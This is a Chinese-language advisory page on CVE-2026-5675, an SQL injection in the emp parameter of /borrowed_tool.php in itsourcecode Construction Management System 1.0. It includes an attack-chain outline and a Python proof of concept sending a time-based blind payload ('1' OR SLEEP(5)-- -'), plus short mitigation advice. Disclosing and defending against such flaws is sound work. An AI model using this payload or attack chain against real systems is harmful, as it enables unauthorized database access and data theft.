IPBUF安全漏洞报告
English
CVE-2026-5675 CVSS 6.3 中危

CVE-2026-5675 itsourcecode建筑管理系统SQL注入漏洞

披露日期: 2026-04-06

漏洞信息

漏洞编号
CVE-2026-5675
漏洞类型
SQL注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
itsourcecode Construction Management System

相关标签

SQL注入CVE-2026-5675itsourcecode建筑管理系统PHP漏洞

漏洞概述

itsourcecode 建筑管理系统 1.0 版本存在 SQL 注入漏洞。攻击者可以通过操作 /borrowed_tool.php 文件中的 emp 参数,构造恶意 SQL 语句执行数据库查询。由于该漏洞无需用户交互且仅需低权限即可远程利用,可能导致敏感信息泄露、数据篡改或服务中断。

技术细节

该漏洞源于 itsourcecode 建筑管理系统 1.0 版本中的 /borrowed_tool.php 文件对用户输入缺乏严格的过滤机制。在参数处理组件中,emp 参数被直接拼接到 SQL 查询语句中执行,未采用预编译语句或有效的输入清洗。攻击者可以利用这一设计缺陷,构造特定的 HTTP 请求,在 emp 参数中注入恶意的 SQL 代码。根据 CVSS 3.1 评分向量,该漏洞攻击复杂度低(AC:L),且无需用户交互(UI:N),仅需低权限(PR:L)即可通过网络(AV:N)进行远程利用。成功利用此漏洞可能导致数据库中的敏感信息(如用户凭证、项目数据)泄露,关键数据被篡改或删除,甚至导致数据库服务不可用,对系统安全构成中等风险。

攻击链分析

STEP 1
侦察
攻击者识别出目标正在使用 itsourcecode 建筑管理系统,并发现可访问的 /borrowed_tool.php 端点。
STEP 2
漏洞探测
攻击者向 borrowed_tool.php 发送带有特殊字符(如单引号)的 emp 参数,观察页面响应是否异常以确认 SQL 注入点。
STEP 3
漏洞利用
攻击者构造恶意的 SQL 语句(如 UNION SELECT 或布尔盲注载荷)并通过 emp 参数发送,试图从数据库中提取敏感数据。
STEP 4
数据窃取或破坏
成功获取数据库权限后,攻击者导出用户信息或修改数据库内容,影响系统的机密性、完整性和可用性。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def verify_sql_injection(target_url): """ PoC for CVE-2026-5675 SQL Injection in borrowed_tool.php """ # The vulnerable parameter is 'emp' # Payload attempts a time-based blind or simple UNION test injection_payload = "1' OR SLEEP(5)-- -" params = { "emp": injection_payload } try: response = requests.get(target_url, params=params, timeout=10) # Analyze response time or content to confirm vulnerability if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability confirmed: SQL Injection in 'emp' parameter.") else: print("[-] Vulnerability not confirmed or patched.") except Exception as e: print(f"[!] Error occurred: {e}") if __name__ == "__main__": url = "http://target-ip/borrowed_tool.php" verify_sql_injection(url)

影响范围

itsourcecode Construction Management System 1.0

防御指南

临时缓解措施
在未修复前,建议通过 Web 应用防火墙(WAF)添加规则,拦截针对 /borrowed_tool.php 的包含 SQL 注入特征的请求。同时,临时禁用该功能页面或限制内部网络访问,以降低被攻击的风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表